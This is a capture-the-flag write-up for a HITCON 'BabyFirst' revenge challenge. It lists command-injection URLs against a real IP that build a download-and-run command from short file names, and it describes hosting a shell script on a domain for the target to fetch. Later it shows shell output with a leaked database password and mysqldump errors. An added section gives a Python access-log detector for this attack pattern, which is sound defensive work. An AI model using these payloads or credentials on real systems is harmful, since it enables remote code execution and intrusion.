Do you remember BabyFirst from HITCON CTF 2015?
This is the harder version!
http://52.199.204.34/
For this kind of challenge, let me just go straight to how it is solved.
Two methods are known:
ls -t>[FILENAME]
Credit to @zblee for this one.
curl [DOMAIN]>[FILENAME]
The idea behind the second method comes from @rebirth; credit to them.
Solution 1:
Reference article:
https://www.leavesongs.com/SHARE/some-tricks-from-my-secret-group.html
Exploit:
https://gist.github.com/WangYihang/281fda47bbf7c74fd4e0e34bb5c45454
Solution 2:
http://52.199.204.34/?cmd=>cur\
http://52.199.204.34/?cmd=>l\ \
http://52.199.204.34/?cmd=>vvv\
http://52.199.204.34/?cmd=>xx\
http://52.199.204.34/?cmd=>x.x\
http://52.199.204.34/?cmd=>y\
http://52.199.204.34/?cmd=>z\>\
http://52.199.204.34/?cmd=>Z
http://52.199.204.34/?cmd=sh Z
The limitation of this method is the domain name: you need to buy a domain whose letters sort in the required order.
After buying it, add an A record, start a web server, and make the home page the shell script you want executed.
What to do after getting a shell
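From the defender's side, the request sequence above has a recognisable shape in a web server's access log: a run of very short `cmd` values that are bare redirections (they create files and run nothing), most ending in a backslash, followed by `sh <file>`. The following detector is an added example written for this page, not code from the original writeup. It assumes the common combined log format and the `cmd` query parameter seen above; the log lines are constructed for the example.

```python
"""Flag request chains that only create files via bare '>' redirection and
then execute one of the resulting files with sh/bash.  The log lines are
constructed for this example; the format is assumed to be the usual
combined access-log layout with a 'cmd' query parameter."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (percent-encoded, as a server would record it).
SAMPLE_LOG = """\
10.0.0.5 - - [04/Nov/2017:10:00:01 +0000] "GET /?cmd=%3Ecur%5C HTTP/1.1" 200 0
10.0.0.5 - - [04/Nov/2017:10:00:02 +0000] "GET /?cmd=%3El%5C%20%5C HTTP/1.1" 200 0
10.0.0.5 - - [04/Nov/2017:10:00:03 +0000] "GET /?cmd=%3Evvv%5C HTTP/1.1" 200 0
10.0.0.5 - - [04/Nov/2017:10:00:04 +0000] "GET /?cmd=%3EZ HTTP/1.1" 200 0
10.0.0.5 - - [04/Nov/2017:10:00:05 +0000] "GET /?cmd=sh%20Z HTTP/1.1" 200 17
10.0.0.9 - - [04/Nov/2017:10:00:06 +0000] "GET /?cmd=ls HTTP/1.1" 200 42
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
EXEC_RE = re.compile(r'(?:sh|bash|\.)\s+(\S+)')  # "sh Z", "bash x", ". x"


def parse_line(line):
    """Return (client_ip, decoded cmd value or None) for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group('path')).query
    cmd = parse_qs(query, keep_blank_values=True).get('cmd', [None])[0]
    return m.group('ip'), cmd


def classify(cmd):
    """Labels for one cmd value: bare redirection, trailing backslash, exec of a file."""
    labels = {}
    if cmd is None:
        return labels
    # A command that starts with '>' only creates/truncates a file; nothing runs.
    labels['redirect_only'] = cmd.startswith('>')
    # A trailing backslash makes that file name join with the next line when a
    # directory listing is later fed to a shell.
    labels['continuation'] = cmd.endswith('\\')
    m = EXEC_RE.fullmatch(cmd)
    labels['exec_target'] = m.group(1) if m else None
    return labels


def analyze(log_text, min_chain=3):
    """Per client IP: counts of redirect-only and continuation commands, files
    executed, and whether the combination looks like a file-assembly chain."""
    per_ip = defaultdict(lambda: {'redirect_only': 0, 'continuation': 0,
                                  'exec_file': [], 'suspicious': False})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, cmd = parsed
        rec = per_ip[ip]
        labels = classify(cmd)
        if labels.get('redirect_only'):
            rec['redirect_only'] += 1
        if labels.get('continuation'):
            rec['continuation'] += 1
        if labels.get('exec_target'):
            rec['exec_file'].append(labels['exec_target'])
    for rec in per_ip.values():
        rec['suspicious'] = (rec['redirect_only'] >= min_chain
                             and rec['continuation'] >= 1
                             and bool(rec['exec_file']))
    return dict(per_ip)


if __name__ == '__main__':
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(ip, rec)
```

The thresholds are deliberately loose: a legitimate user of such an endpoint almost never issues several commands that consist of nothing but a redirection, so even `min_chain=3` with one trailing backslash and one `sh` of a just-created file is a strong signal worth alerting on.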
[sniper]=>cat /home/fl4444g/*
[-] Unsupported function!
[+] Executing command on target server...
[+] Result :
Flag is in the MySQL database
fl4444g / SugZXUtgeJ52_Bvr
mysqldump: [Warning] Using a password on the command line interface can be insecure.
mysqldump: Got error: 1044: Access denied for user 'fl4444g'@'%' to database 'fl4gdb' when using LOCK TABLES
-- MySQL dump 10.13 Distrib 5.7.20, for Linux (x86_64)
--
-- Host: localhost Database:
-- ------------------------------------------------------
-- Server version	5.7.20-0ubuntu0.16.04.1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `fl4gdb`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `fl4gdb` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `fl4gdb`;
It errored out:
mysqldump: Got error: 1044: Access denied for user 'fl4444g'@'%' to database 'fl4gdb' when using LOCK TABLES
Time was tight during the competition, so I did not look into why; I googled a solution and moved on to other challenges.
Solution: https://michaelrigart.be/mysqldump-1044-access-denied-using-lock-tables/
$ mysqldump --single-transaction -u user -p DBNAME > backup.sql
Reference documentation: https://dev.mysql.com/doc/refman/5.7/en/mysqldump.html